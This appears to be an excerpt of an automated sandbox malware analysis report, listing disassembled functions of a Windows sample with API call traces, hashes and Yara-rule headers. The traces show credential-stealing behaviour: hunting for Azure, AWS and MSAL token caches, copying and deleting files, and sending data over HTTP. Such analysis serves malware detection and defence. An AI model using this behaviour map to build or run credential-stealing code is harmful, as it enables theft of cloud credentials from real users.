                                    • lstrlen.KERNEL32(004259C8), ref: 007E4939
                                    • lstrlen.KERNEL32(?), ref: 007E4944
                                    • strlen.MSVCRT ref: 007E4957
                                    • lstrlen.KERNEL32(00425B18), ref: 007E497F
                                    • lstrlen.KERNEL32(00425BC0), ref: 007E498A
                                    • lstrlen.KERNEL32(00425C68), ref: 007E4995
                                    • lstrlen.KERNEL32(00425D10), ref: 007E49A0
                                    • lstrlen.KERNEL32(00425DB8), ref: 007E49AB
                                    • lstrlen.KERNEL32(00425E60), ref: 007E49BB
                                    • lstrlen.KERNEL32(00425F08), ref: 007E49C6
                                    • lstrlen.KERNEL32(00425FB0), ref: 007E49D1
                                    • lstrlen.KERNEL32(00426058), ref: 007E49DC
                                    • lstrlen.KERNEL32(00426100), ref: 007E49E7
                                    • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 007E4A03
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                    • String ID:
                                    • API String ID: 2127927946-0
                                    • Opcode ID: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                    • Instruction ID: fae35708eb3f9612709036cdb0a8d25a3c44bc35552dc5c9a9d64343533d5a49
                                    • Opcode Fuzzy Hash: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                    • Instruction Fuzzy Hash: 2141DA79740624EBC718AFE5FC8DB987F71AB4C702BA0C062F90295190CBB9D5019B3D
                                    Function 007F9AC7 Relevance: 49.7, APIs: 33, Instructions: 212libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcAddress.KERNEL32(0064A8B0,0064A204), ref: 007F9B08
                                    • GetProcAddress.KERNEL32(0064A8B0,0064A5C8), ref: 007F9B21
                                    • GetProcAddress.KERNEL32(0064A8B0,0064A644), ref: 007F9B39
                                    • GetProcAddress.KERNEL32(0064A8B0,0064A264), ref: 007F9B51
                                    • GetProcAddress.KERNEL32(0064A8B0,0064A250), ref: 007F9B6A
                                    • GetProcAddress.KERNEL32(0064A8B0,0064A2F8), ref: 007F9B82
                                    • GetProcAddress.KERNEL32(0064A8B0,0064A4D4), ref: 007F9B9A
                                    • GetProcAddress.KERNEL32(0064A8B0,0064A33C), ref: 007F9BB3
                                    • GetProcAddress.KERNEL32(0064A8B0,0064A5A0), ref: 007F9BCB
                                    • GetProcAddress.KERNEL32(0064A8B0,0064A548), ref: 007F9BE3
                                    • GetProcAddress.KERNEL32(0064A8B0,0064A3BC), ref: 007F9BFC
                                    • GetProcAddress.KERNEL32(0064A8B0,0064A2E8), ref: 007F9C14
                                    • GetProcAddress.KERNEL32(0064A8B0,0064A60C), ref: 007F9C2C
                                    • GetProcAddress.KERNEL32(0064A8B0,0064A0B0), ref: 007F9C45
                                    • GetProcAddress.KERNEL32(0064A8B0,0064A598), ref: 007F9C5D
                                    • GetProcAddress.KERNEL32(0064A8B0,0064A224), ref: 007F9C75
                                    • GetProcAddress.KERNEL32(0064A8B0,0064A418), ref: 007F9C8E
                                    • GetProcAddress.KERNEL32(0064A8B0,0064A634), ref: 007F9CA6
                                    • GetProcAddress.KERNEL32(0064A8B0,0064A0BC), ref: 007F9CBE
                                    • GetProcAddress.KERNEL32(0064A8B0,0064A12C), ref: 007F9CD7
                                    • GetProcAddress.KERNEL32(0064A8B0,0064A2B0), ref: 007F9CEF
                                    • LoadLibraryA.KERNEL32(0064A550,?,007F6C67), ref: 007F9D01
                                    • LoadLibraryA.KERNEL32(0064A17C,?,007F6C67), ref: 007F9D12
                                    • LoadLibraryA.KERNEL32(0064A104,?,007F6C67), ref: 007F9D24
                                    • LoadLibraryA.KERNEL32(0064A1DC,?,007F6C67), ref: 007F9D36
                                    • LoadLibraryA.KERNEL32(0064A328,?,007F6C67), ref: 007F9D47
                                    • GetProcAddress.KERNEL32(0064A6D4,0064A4AC), ref: 007F9D69
                                    • GetProcAddress.KERNEL32(0064A7F4,0064A424), ref: 007F9D8A
                                    • GetProcAddress.KERNEL32(0064A7F4,0064A1CC), ref: 007F9DA2
                                    • GetProcAddress.KERNEL32(0064A8E4,0064A394), ref: 007F9DC4
                                    • GetProcAddress.KERNEL32(0064A7A8,0064A128), ref: 007F9DE5
                                    • GetProcAddress.KERNEL32(0064A7D8,0064A414), ref: 007F9E06
                                    • GetProcAddress.KERNEL32(0064A7D8,00420724), ref: 007F9E1D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID:
                                    • API String ID: 2238633743-0
                                    • Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                    • Instruction ID: e7a5685ff74a1fa169fce1c1b09efaf00b5f9e129014be481623354cde75a331
                                    • Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                    • Instruction Fuzzy Hash: 1CA13DBD5C0240BFE354EFE8ED88AA63BFBF74E301714661AE605C3264D6399441DB52
                                    Function 007F04B7 Relevance: 48.4, APIs: 32, Instructions: 363stringmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 007FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 007FA9EF
                                      • Part of subcall function 007F9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 007F9072
                                      • Part of subcall function 007FAB87: lstrcpy.KERNEL32(00000000,?), ref: 007FABD9
                                      • Part of subcall function 007FAB87: lstrcat.KERNEL32(00000000), ref: 007FABE9
                                      • Part of subcall function 007FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 007FAB6C
                                      • Part of subcall function 007FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 007FAC2C
                                      • Part of subcall function 007FAC17: lstrcpy.KERNEL32(00000000), ref: 007FAC6B
                                      • Part of subcall function 007FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 007FAC79
                                      • Part of subcall function 007FAA07: lstrcpy.KERNEL32(?,00000000), ref: 007FAA4D
                                      • Part of subcall function 007E9C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007E9C53
                                      • Part of subcall function 007E9C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 007E9C78
                                      • Part of subcall function 007E9C27: LocalAlloc.KERNEL32(00000040,?), ref: 007E9C98
                                      • Part of subcall function 007E9C27: ReadFile.KERNEL32(000000FF,?,00000000,007E16F6,00000000), ref: 007E9CC1
                                      • Part of subcall function 007E9C27: LocalFree.KERNEL32(007E16F6), ref: 007E9CF7
                                      • Part of subcall function 007E9C27: CloseHandle.KERNEL32(000000FF), ref: 007E9D01
                                      • Part of subcall function 007F9097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 007F90B9
                                    • strtok_s.MSVCRT ref: 007F0582
                                    • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 007F05C9
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 007F05D0
                                    • StrStrA.SHLWAPI(00000000,00421618), ref: 007F05EC
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 007F05FA
                                      • Part of subcall function 007F8B47: malloc.MSVCRT ref: 007F8B4F
                                      • Part of subcall function 007F8B47: strncpy.MSVCRT ref: 007F8B6A
                                    • StrStrA.SHLWAPI(00000000,00421620), ref: 007F0636
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 007F0644
                                    • StrStrA.SHLWAPI(00000000,00421628), ref: 007F0680
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 007F068E
                                    • StrStrA.SHLWAPI(00000000,00421630), ref: 007F06CA
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 007F06DC
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 007F0769
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 007F0781
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 007F0799
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 007F07B1
                                    • lstrcat.KERNEL32(?,0042164C), ref: 007F07C9
                                    • lstrcat.KERNEL32(?,00421660), ref: 007F07D8
                                    • lstrcat.KERNEL32(?,00421670), ref: 007F07E7
                                    • lstrcat.KERNEL32(?,00000000), ref: 007F07FA
                                    • lstrcat.KERNEL32(?,00421678), ref: 007F0809
                                    • lstrcat.KERNEL32(?,00000000), ref: 007F081C
                                    • lstrcat.KERNEL32(?,0042167C), ref: 007F082B
                                    • lstrcat.KERNEL32(?,00421680), ref: 007F083A
                                    • lstrcat.KERNEL32(?,00000000), ref: 007F084D
                                    • lstrcat.KERNEL32(?,00421688), ref: 007F085C
                                    • lstrcat.KERNEL32(?,0042168C), ref: 007F086B
                                    • lstrcat.KERNEL32(?,00000000), ref: 007F087E
                                    • lstrcat.KERNEL32(?,00421698), ref: 007F088D
                                    • lstrcat.KERNEL32(?,0042169C), ref: 007F089C
                                    • strtok_s.MSVCRT ref: 007F08E0
                                    • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 007F08F5
                                    • memset.MSVCRT ref: 007F0944
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeapstrtok_s$AllocateCloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                    • String ID:
                                    • API String ID: 3689735781-0
                                    • Opcode ID: c4d654fd63af8b96c424d1b0ea7922b0682d9adc7819136a205fb9eb7b79f56e
                                    • Instruction ID: 009cf09e9642fed17e3f9831fd49c084686e42f1abb8e6eddd178158d9d8061c
                                    • Opcode Fuzzy Hash: c4d654fd63af8b96c424d1b0ea7922b0682d9adc7819136a205fb9eb7b79f56e
                                    • Instruction Fuzzy Hash: E8D112B5A4020CFBCB04EBE4DD5AEFD7779BF14300F508519F206A6291DE78AA49CB61
                                    Function 00405960 Relevance: 42.5, APIs: 19, Strings: 5, Instructions: 493networkstringmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                      • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                      • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                      • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                      • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                      • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004059F8
                                    • StrCmpCA.SHLWAPI(?,00A1B398), ref: 00405A13
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405B93
                                    • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00A1B388,00000000,?,00A14A48,00000000,?,00421A1C), ref: 00405E71
                                    • lstrlenA.KERNEL32(00000000), ref: 00405E82
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00405E93
                                    • HeapAlloc.KERNEL32(00000000), ref: 00405E9A
                                    • lstrlenA.KERNEL32(00000000), ref: 00405EAF
                                    • memcpy.MSVCRT(?,00000000,00000000), ref: 00405EC6
                                    • lstrlenA.KERNEL32(00000000), ref: 00405ED8
                                    • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405EF1
                                    • memcpy.MSVCRT(?), ref: 00405EFE
                                    • lstrlenA.KERNEL32(00000000,?,?), ref: 00405F1B
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405F2F
                                    • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405F4C
                                    • InternetCloseHandle.WININET(00000000), ref: 00405FB0
                                    • InternetCloseHandle.WININET(00000000), ref: 00405FBD
                                    • HttpOpenRequestA.WININET(00000000,00A1B218,?,00A1A780,00000000,00000000,00400100,00000000), ref: 00405BF8
                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                    • InternetCloseHandle.WININET(00000000), ref: 00405FC7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
                                    • String ID: "$"$------$------$------
                                    • API String ID: 1406981993-2180234286
                                    • Opcode ID: 29c6a945f459f2f8c1075a72b727d682fe226b594e8a99ac19100750237bb99c
                                    • Instruction ID: 7b5b204680124ce1d4beb717fdfef1c68a0c63715f2d18b0248442adb904f056
                                    • Opcode Fuzzy Hash: 29c6a945f459f2f8c1075a72b727d682fe226b594e8a99ac19100750237bb99c
                                    • Instruction Fuzzy Hash: 20124071821118ABCB15FBA1DC95FEEB378BF14314F50419EB10A62091DF782B9ACF69
                                    Function 00414D70 Relevance: 35.1, APIs: 10, Strings: 10, Instructions: 119stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • memset.MSVCRT ref: 00414D87
                                      • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                    • lstrcatA.KERNEL32(?,00000000), ref: 00414DB0
                                    • lstrcatA.KERNEL32(?,\.azure\), ref: 00414DCD
                                      • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                      • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                    • memset.MSVCRT ref: 00414E13
                                    • lstrcatA.KERNEL32(?,00000000), ref: 00414E3C
                                    • lstrcatA.KERNEL32(?,\.aws\), ref: 00414E59
                                      • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                      • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                      • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                      • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                    • memset.MSVCRT ref: 00414E9F
                                    • lstrcatA.KERNEL32(?,00000000), ref: 00414EC8
                                    • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00414EE5
                                      • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149B0
                                      • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,004208D2), ref: 004149C5
                                      • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149E2
                                      • Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
                                      • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00A130A0,?,000003E8), ref: 00414A4A
                                      • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FF8), ref: 00414A5C
                                      • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A70
                                      • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FFC), ref: 00414A82
                                      • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A96
                                      • Part of subcall function 00414910: CopyFileA.KERNEL32(?,?,00000001), ref: 00414AAC
                                      • Part of subcall function 00414910: DeleteFileA.KERNEL32(?), ref: 00414B31
                                    • memset.MSVCRT ref: 00414F2B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                    • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache$zaA
                                    • API String ID: 4017274736-156832076
                                    • Opcode ID: c1a912e1918b28a31d7af5b1191f4ab077717743ad3d56635481e1ea4761ad81
                                    • Instruction ID: 18812f4626155d1e2a42465cb68794f5c6847905bec5d07e7ac1139e0e5490f3
                                    • Opcode Fuzzy Hash: c1a912e1918b28a31d7af5b1191f4ab077717743ad3d56635481e1ea4761ad81
                                    • Instruction Fuzzy Hash: 3141D6B9A4031467C710F7B0EC47FDD3738AB64704F404459B645660C2EEB897D98B9A
                                    Function 007ED157 Relevance: 31.9, APIs: 21, Instructions: 374stringmemoryfileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 007FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 007FA9EF
                                      • Part of subcall function 007FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 007FAC2C
                                      • Part of subcall function 007FAC17: lstrcpy.KERNEL32(00000000), ref: 007FAC6B
                                      • Part of subcall function 007FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 007FAC79
                                      • Part of subcall function 007FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 007FAB6C
                                      • Part of subcall function 007F8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,007E1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 007F8DED
                                      • Part of subcall function 007FAB87: lstrcpy.KERNEL32(00000000,?), ref: 007FABD9
                                      • Part of subcall function 007FAB87: lstrcat.KERNEL32(00000000), ref: 007FABE9
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 007ED1EA
                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 007ED32E
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 007ED335
                                    • lstrcat.KERNEL32(?,00000000), ref: 007ED46F
                                    • lstrcat.KERNEL32(?,00421478), ref: 007ED47E
                                    • lstrcat.KERNEL32(?,00000000), ref: 007ED491
                                    • lstrcat.KERNEL32(?,0042147C), ref: 007ED4A0
                                    • lstrcat.KERNEL32(?,00000000), ref: 007ED4B3
                                    • lstrcat.KERNEL32(?,00421480), ref: 007ED4C2
                                    • lstrcat.KERNEL32(?,00000000), ref: 007ED4D5
                                    • lstrcat.KERNEL32(?,00421484), ref: 007ED4E4
                                    • lstrcat.KERNEL32(?,00000000), ref: 007ED4F7
                                    • lstrcat.KERNEL32(?,00421488), ref: 007ED506
                                    • lstrcat.KERNEL32(?,00000000), ref: 007ED519
                                    • lstrcat.KERNEL32(?,0042148C), ref: 007ED528
                                    • lstrcat.KERNEL32(?,00000000), ref: 007ED53B
                                    • lstrcat.KERNEL32(?,00421490), ref: 007ED54A
                                      • Part of subcall function 007FAA87: lstrlen.KERNEL32(007E516C,?,?,007E516C,00420DDE), ref: 007FAA92
                                      • Part of subcall function 007FAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 007FAAEC
                                    • lstrlen.KERNEL32(?), ref: 007ED591
                                    • lstrlen.KERNEL32(?), ref: 007ED5A0
                                    • memset.MSVCRT ref: 007ED5EF
                                      • Part of subcall function 007FACD7: StrCmpCA.SHLWAPI(0064A350,007EAA0E,?,007EAA0E,0064A350), ref: 007FACF6
                                    • DeleteFileA.KERNEL32(00000000), ref: 007ED61B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312211700.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7e0000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
                                    • String ID:
                                    • API String ID: 1973479514-0
                                    • Opcode ID: 35b3a7c6026b7343794acd9bc88f8a24a43edb670061b4873ce96399e81ec4f6
                                    • Instruction ID: 26b3cdee88c9a091cb329a47e9b70a1591e9e2559807beb3d593ed9627353a15
                                    • Opcode Fuzzy Hash: 35b3a7c6026b7343794acd9bc88f8a24a43edb670061b4873ce96399e81ec4f6
                                    • Instruction Fuzzy Hash: 20E10FB5950218FBCB04FBE0DD5ADFE7379AF14301F504159F20AA6291DE396E09CB62
                                    Function 0040CEF0 Relevance: 31.9, APIs: 21, Instructions: 374stringmemoryfileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                      • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00A14A78,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CF83
                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040D0C7
                                    • HeapAlloc.KERNEL32(00000000), ref: 0040D0CE
                                    • lstrcatA.KERNEL32(?,00000000,00A12DF0,00421474,00A12DF0,00421470,00000000), ref: 0040D208
                                    • lstrcatA.KERNEL32(?,00421478), ref: 0040D217
                                    • lstrcatA.KERNEL32(?,00000000), ref: 0040D22A
                                    • lstrcatA.KERNEL32(?,0042147C), ref: 0040D239
                                    • lstrcatA.KERNEL32(?,00000000), ref: 0040D24C
                                    • lstrcatA.KERNEL32(?,00421480), ref: 0040D25B
                                    • lstrcatA.KERNEL32(?,00000000), ref: 0040D26E
                                    • lstrcatA.KERNEL32(?,00421484), ref: 0040D27D
                                    • lstrcatA.KERNEL32(?,00000000), ref: 0040D290
                                    • lstrcatA.KERNEL32(?,00421488), ref: 0040D29F
                                    • lstrcatA.KERNEL32(?,00000000), ref: 0040D2B2
                                    • lstrcatA.KERNEL32(?,0042148C), ref: 0040D2C1
                                    • lstrcatA.KERNEL32(?,00000000), ref: 0040D2D4
                                    • lstrcatA.KERNEL32(?,00421490), ref: 0040D2E3
                                      • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00A12D90,?,0042110C,?,00000000), ref: 0041A82B
                                      • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                    • lstrlenA.KERNEL32(?), ref: 0040D32A
                                    • lstrlenA.KERNEL32(?), ref: 0040D339
                                    • memset.MSVCRT ref: 0040D388
                                      • Part of subcall function 0041AA70: StrCmpCA.SHLWAPI(00000000,00421470,0040D1A2,00421470,00000000), ref: 0041AA8F
                                    • DeleteFileA.KERNEL32(00000000), ref: 0040D3B4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2312038691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2312038691.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2312038691.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ttFpxuMwKz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocCopyDeleteProcessSystemTimememset
                                    • String ID:
                                    • API String ID: 2775534915-0
                                    • Opcode ID: a4f97debc43b6bb646af20662aa76c17e404fc0e6804846b70a1b628625fc9e7
                                    • Instruction ID: 94f9062ed3f4a6e26da847402fe0a382ec35b8ad99342330bde04fa79d6a5422
                                    • Opcode Fuzzy Hash: a4f97debc43b6bb646af20662aa76c17e404fc0e6804846b70a1b628625fc9e7
                                    • Instruction Fuzzy Hash: D2E17D75950108ABCB04FBE1DD96EEE7379BF14304F10405EF107B60A1DE38AA5ACB6A
                                    Function 007E5BC7 Relevance: 29.0, APIs: 19, Instructions: 493networkstringmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 007FAA07: lstrcpy.KERNEL32(?,00000000), ref: 007FAA4D
                                      • Part of subcall function 007E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 007E4A51
                                      • Part of subcall function 007E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 007E4A68
                                      • Part of subcall function 007E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 007E4A7F
                                      • Part of subcall function 007E4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 007E4AA0
                                      • Part of subcall function 007E4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 007E4AB0
                                      • Part of subcall function 007FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 007FA9EF
                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 007E5C5F
                                    • StrCmpCA.SHLWAPI(?,0064A480), ref: 007E5C7A
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 007E5DFA
                                    • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00421A20,00000000,?,0064A0F0,00000000,?,0064A2F0,00000000,?,00421A1C), ref: 007E60D8
                                    • lstrlen.KERNEL32(00000000), ref: 007E60E9
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 007E60FA
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 007E6101
                                    • lstrlen.KERNEL32(00000000), ref: 007E6116
                                    • memcpy.MSVCRT(?,00000000,00000000), ref: 007E612D
                                    • lstrlen.KERNEL32(00000000), ref: 007E613F
                                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 007E6158
                                    • memcpy.MSVCRT(?), ref: 007E6165
                                    • lstrlen.KERNEL32(00000000,?,?), ref: 007E6182
